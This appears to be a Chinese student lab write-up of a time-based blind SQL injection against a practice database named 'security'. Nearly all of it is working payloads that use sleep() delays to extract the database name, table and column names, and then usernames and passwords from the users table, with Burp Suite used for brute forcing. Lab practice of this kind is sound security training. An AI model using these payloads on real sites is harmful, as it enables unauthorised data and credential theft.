id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了
id=1 and sleep(5) //未延迟
id=1' and sleep(5) //延迟(明显加载慢了几秒)
id=1' and if (length(database())>5 ,sleep(5),1) -- + //明显延迟
id=1' and if (length(database())<10 ,sleep(5),1) -- +//明显延迟
id=1' and if (length(database())=6 ,sleep(5),1) -- +//未延迟
id=1' and if (length(database())=7 ,sleep(5),1) -- +//未延迟
id=1' and if (length(database())=8 ,sleep(5),1) -- +//明显延迟
id=1' and if(ascii(substr(database(),1,1))=1,sleep(5),1) -- +
id=1' and if((select count(table_name) from information_schema.tables where table_schema='security')=1,sleep(5),1) -- +
id=1' and if((length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1),sleep(5),1) -- +
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jguWJlnd-1626704143260)(实验六.assets/image-20210624004112935.png)]
id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1),sleep(5),1) -- +
结合上文,推测users表是我们想要爆破的用户密码表
结合burpsuite的重放攻击,设置1个paylod
id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=1,sleep(5),1) --+
id=1' and if((length(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1))=1),sleep(5),1) --+
id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=1),sleep(5),1) --+
id=1' and if((select count(username) from security.users)=1,sleep(5),1) --+
id=1' and (select count(username) from security.users)=1 -- +
id=1' and if((length(substr((select concat(username,password) from security.users limit 0,1),1))=1),sleep(5),1) --+
id=1' and if((ascii(substr((select concat(username,password) from security.users limit 0,1),1,1))=1),sleep(5),1) --+